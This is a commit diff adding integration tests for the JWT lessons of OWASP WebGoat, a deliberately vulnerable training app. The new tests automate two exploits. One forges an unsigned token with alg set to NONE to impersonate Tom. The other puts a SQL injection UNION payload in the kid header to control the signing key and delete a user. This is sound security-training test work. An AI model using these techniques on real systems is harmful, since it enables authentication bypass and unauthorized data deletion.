fix for JWT green button and WebWolf intro green button and added jwt int tests (#808)

2020-05-07 08:28:45 +02:00
parent f4838e1233
commit 832d6432fc
4 changed files with 74 additions and 10 deletions
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
@ -8,10 +8,11 @@ import java.time.Instant;
 import java.util.Base64;
 import java.util.Calendar;
 import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;

 import org.hamcrest.CoreMatchers;
 import org.junit.Assert;
-import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.jwt.JWTSecretKeyEndpoint;

@ -19,6 +20,8 @@ import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.fasterxml.jackson.databind.node.ObjectNode;

+import io.jsonwebtoken.Header;
+import io.jsonwebtoken.JwsHeader;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
@ -37,7 +40,11 @@ public class JWTLessonTest extends IntegrationTest {
                
        findPassword();
        
-        //        checkResults("/JWT/");
+        buyAsTom();
+        
+        deleteTom();
+        
+        checkResults("/JWT/");

    }
    
@ -131,4 +138,55 @@ public class JWTLessonTest extends IntegrationTest {
                        .extract().path("lessonCompleted"), CoreMatchers.is(true));
    }
    
+	private void buyAsTom() throws IOException {
+		
+		String header = new String(Base64.getUrlDecoder().decode("eyJhbGciOiJIUzUxMiJ9".getBytes(Charset.defaultCharset())));
+
+		String body = new String(Base64.getUrlDecoder().decode("eyJhZG1pbiI6ImZhbHNlIiwidXNlciI6IkplcnJ5In0".getBytes(Charset.defaultCharset())));
+
+		body = body.replace("Jerry", "Tom");
+		
+		ObjectMapper mapper = new ObjectMapper();
+		JsonNode headerNode = mapper.readTree(header);
+		headerNode = ((ObjectNode) headerNode).put("alg", "NONE");
+
+		String replacedToken = new String(Base64.getUrlEncoder().encode(headerNode.toString().getBytes())).concat(".")
+				.concat(new String(Base64.getUrlEncoder().encode(body.getBytes())).toString())
+				.concat(".").replace("=", "");
+
+		Assert.assertThat(RestAssured.given()
+				.when().relaxedHTTPSValidation()
+				.cookie("JSESSIONID", getWebGoatCookie())
+				.header("Authorization","Bearer "+replacedToken)
+				.post(url("/WebGoat/JWT/refresh/checkout"))
+				.then().statusCode(200)
+				.extract().path("lessonCompleted"), CoreMatchers.is(true));
+	}
+	
+	private void deleteTom() {
+		
+		Map<String, Object> header = new HashMap();
+		  header.put(Header.TYPE, Header.JWT_TYPE);
+		  header.put(JwsHeader.KEY_ID, "hacked' UNION select 'deletingTom' from INFORMATION_SCHEMA.SYSTEM_USERS --");
+		String token = Jwts.builder()
+				.setHeader(header)
+				.setIssuer("WebGoat Token Builder")
+				.setAudience("webgoat.org")
+				.setIssuedAt(Calendar.getInstance().getTime())
+				.setExpiration(Date.from(Instant.now().plusSeconds(60)))
+				.setSubject("tom@webgoat.org")
+				.claim("username", "Tom")
+				.claim("Email", "tom@webgoat.org")
+				.claim("Role", new String[] {"Manager", "Project Administrator"})
+				.signWith(SignatureAlgorithm.HS256, "deletingTom").compact();
+		
+		Assert.assertThat(RestAssured.given()
+				.when().relaxedHTTPSValidation()
+				.cookie("JSESSIONID", getWebGoatCookie())
+				.post(url("/WebGoat/JWT/final/delete?token="+token))
+				.then()
+				.statusCode(200)
+				.extract().path("lessonCompleted"), CoreMatchers.is(true));
+	}
+    
 }